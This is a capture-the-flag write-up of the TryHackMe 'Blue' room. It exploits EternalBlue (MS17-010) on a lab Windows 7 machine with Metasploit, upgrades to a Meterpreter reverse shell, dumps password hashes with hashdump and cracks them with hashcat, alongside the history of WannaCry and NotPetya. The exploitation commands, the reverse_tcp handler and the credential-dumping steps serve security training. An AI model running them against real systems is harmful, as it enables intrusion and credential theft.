Exploiting EternalBlue in a Windows 7 Lab (and Wrestling With Meterpreter)

The Blue CTF targets a Windows 7 machine vulnerable to EternalBlue. The goal is straightforward: exploit SMB, gain access, escalate privileges, and locate the flags. In practice, the interesting part turns out to be dealing with some quirks in Metasploit Framework.

🔗 https://tryhackme.com/room/blue

🔍 Initial Recon

A port scan reveals the following:

PORT     STATE  SERVICE      VERSION
21/tcp   closed ftp
22/tcp   closed ssh
23/tcp   closed telnet
25/tcp   closed smtp
80/tcp   closed http
110/tcp  closed pop3
139/tcp  open   netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  closed https
445/tcp  open   microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open   tcpwrapped

The important ports here are 139 and 445, which expose SMB services on a Windows 7 machine. That combination strongly suggests the possibility of an MS17-010 vulnerability.

💣 A Quick History of EternalBlue

Before exploiting the vulnerability, it’s worth understanding why EternalBlue is such a famous exploit.

Originally, EternalBlue was not a public exploit at all. It was a cyber weapon developed by the National Security Agency as part of its offensive hacking toolkit. The exploit targeted a flaw in the SMBv1 protocol used by Microsoft Windows systems for file sharing.

For years it remained classified: until 2017.

A mysterious group calling itself The Shadow Brokers began releasing stolen cyber tools believed to belong to the NSA’s Equation Group. In April 2017 they published a large archive containing EternalBlue and several other offensive exploits.

Just a month later, attackers used EternalBlue to launch the WannaCry ransomware worm.

The attack spread automatically across networks by exploiting vulnerable SMB services. Within hours it infected more than 200,000 systems in over 150 countries.

One of the most visible victims was the UK’s National Health Service, where hospitals were forced to cancel appointments and divert emergency patients after their computers were locked by ransomware.

Shortly afterward, EternalBlue appeared again in the NotPetya attack. Unlike WannaCry, NotPetya was designed not for ransom but for destruction, wiping systems and causing billions of dollars in damage to companies such as Maersk and Merck & Co..

Even years later, EternalBlue continues to appear in penetration tests and occasionally in real-world attacks because:

many legacy systems remain unpatched
SMBv1 is still enabled in some environments
organizations continue to run outdated Windows versions

For security professionals, EternalBlue remains a classic case study in vulnerability management, cyber-weapon leakage, and large-scale cyber incidents.

🚀 Launching the Exploit

Start Metasploit:

msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue

Show options will show us the parameters we can configure. We need to use set RHOST target (which stands for Remote Host) and set LHOST myIP (Local Host) to specify the target machine’s IP and our attacking machine’s IP respectively.

One quirk appears immediately; Metasploit does not consult /etc/hosts, so the target IP and our own IP must be entered manually.

Another issue will appear if you attempt to start your listener manually using nc -lvnp 4444. Starting a listener manually conflicts with Metasploit’s handler and the exploit will fail. Don’t ask me how I know. You have been warned!

exploit

Eventually the exploit lands a shell on the target system.

🔧 Upgrading the Shell to Meterpreter

At the Windows prompt, press:

Ctrl + Z

This backgrounds the shell session.

Then run:

sessions -u 1

This triggers the shell-to-Meterpreter upgrade:

[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

In our instance the upgrade crashes, which turns out to be a common issue. EternalBlue frequently lands in an unstable process that dies during upgrade attempts.

We’re going to hear a lot about sessions in this CTF. What are they? A Meterpreter session is an active, interactive connection between the attacker’s machine and a compromised target system created by a Meterpreter payload from the Metasploit Framework. 💻 You can have multiple sessions and select between them.

Running sessions shows the original shell is still active.

The recommended workaround is to launch a dedicated handler:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT 4433
run -j

Then manually upgrade the shell:

use post/multi/manage/shell_to_meterpreter

After configuring the RHOST and LHOST options manually using set, the upgrade succeeds.

Speaking of quirks: sometimes Metasploit does not redraw the prompt. It can look like the console is frozen or that the process is hanging. Just start typing and entering commands as if a prompt exists. If the process is not frozen, the instructions will go through.

Select and interact with the new session:

sessions -i 2

Now a proper Meterpreter session is active.

🤷What’s the difference?

What’s the difference between the first session and the Meterpreter session? The first session is usually a basic command shell created directly by the exploit.

What it is:

A standard Windows command shell (cmd.exe)
Limited interaction
Basically the same as if you connected through a raw remote terminal

Capabilities:

Run normal Windows commands (dir, whoami, ipconfig)
Navigate directories
Execute programs

Limitations:

No built‑in post‑exploitation tools
No easy privilege escalation modules
No filesystem helpers
Harder to manage files or processes

🧰 The Meterpreter Session

A Meterpreter session is a full post‑exploitation payload provided by Metasploit Framework.

Instead of just giving you a shell, it loads a dynamic agent directly into memory on the target.

Capabilities:

Advanced filesystem commands (ls, download, upload)
Credential dumping
Process migration
Screenshot and webcam capture
Pivoting and port forwarding
Privilege escalation helpers
In‑memory execution (stealthier)

Common commands include:

pwd
ls
getuid
hashdump
ps
migrate

⚠️Important: Meterpreter ≠ Elevated Privileges!

Meterpreter is powerful, but it doesn’t automatically grant you elevated privileges. It’s just a payload and post‑exploitation framework provided by Metasploit Framework. The privileges you get in a Meterpreter session are exactly the same as the process that launched it.

⚙️ How Privileges Actually Work

When a Meterpreter session opens, it inherits the permissions of the exploited process.

Examples:

Exploited Service	Meterpreter Privilege
IIS web server	`IIS APPPOOL` or `NETWORK SERVICE`
User application	Normal user
SMB service exploit	Often `NT AUTHORITY\SYSTEM`

This is why exploits like EternalBlue are powerful — they target kernel‑level SMB services, which run as SYSTEM, so the session often starts with maximum privileges already. You can check your privilege with getuid. We are indeed SYSTEM; no privilege escalation is necessary in this CTF!

🔑 Dumping Password Hashes

First, list processes:

ps

We’ve already seen that our hold on the target machine is tenuous; the sessions are prone to failure. We can migrate that instability by moving the session into a more stable process:

migrate <PID_of_powershell>

Next, dump password hashes:

hashdump

Example output:

Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Format:
username:RID:LMhash:NTLMhash:::
So we really only need the following:

ffb43f0de35be4d9917ac0cc8ad57f8d

Crack it using Hashcat. Use mode 1000 since it’s an NTLM hash:

hashcat -m 1000 jonHash.txt /usr/share/wordlists/rockyou.txt

🧭 Navigating Windows as SYSTEM

Again, our session is running as NT AUTHORITY\SYSTEM, which should provide full access.

However, simple commands sometimes fail. For example:

dir C:\Users\Jon\My Documents

returns an access error.

This turns out to be a Windows filesystem quirk involving junction directories. Some folders redirect internally, and tools like Meterpreter do not always resolve them correctly.

Another fun quirk happens when traversing paths. Think you can change directories as per usual? Lol, no, of course not. Sometimes double backslashes are required:

cd C:\\Users\\Jon\\Documents

When you interact through Meterpreter inside the Metasploit Framework, the command parser sometimes treats the backslash as an escape character. That means a single \ can be interpreted as an escape indicator or part of a string control sequence. To ensure the backslash is interpreted literally, it can require escaping the escape character. Fun, right?

🖥 Dropping Into a Windows Shell

If the fun becomes too much for you, dropping into a native Windows shell can help tone down the quirkiness:

shell

We can now change directories as per usual. Poke around to find the flags.

📌 Notes From the Lab

A few reminders that come out of this exercise:

type is the Windows equivalent of cat
shell drops into a Windows command prompt
exit returns to Meterpreter
Windows sometimes contains both Documents and My Documents, which can be confusing
Meterpreter sessions can be fragile
Meterpreter sometimes fails to redraw the prompt; go ahead and enter in commands to determine if it’s hanging
The muscle memory that tells you to hit ctrl-c in order to stop a problematic process may betray you; it will stop Meterpreter, killing your session
In Meterpreter, sometimes you have to escape escape characters and construct paths with double slashes, e.g. cd C:\\Users\\Jon\\Documents

🧠 Final Thoughts

Getting the flags for the Blue CTF is relatively straightforward once SMB exposure is identified. The more interesting challenge lies in post-exploitation navigation and overcoming Meterpreter quirks.

Meterpreter occasionally struggles with Windows junction directories, EternalBlue shells can be fragile during upgrades, and the Metasploit console sometimes fails to redraw its prompt. Once those quirks are understood, the rest of the exercise falls into place. Another one in the books!

Blue: A Historic CTF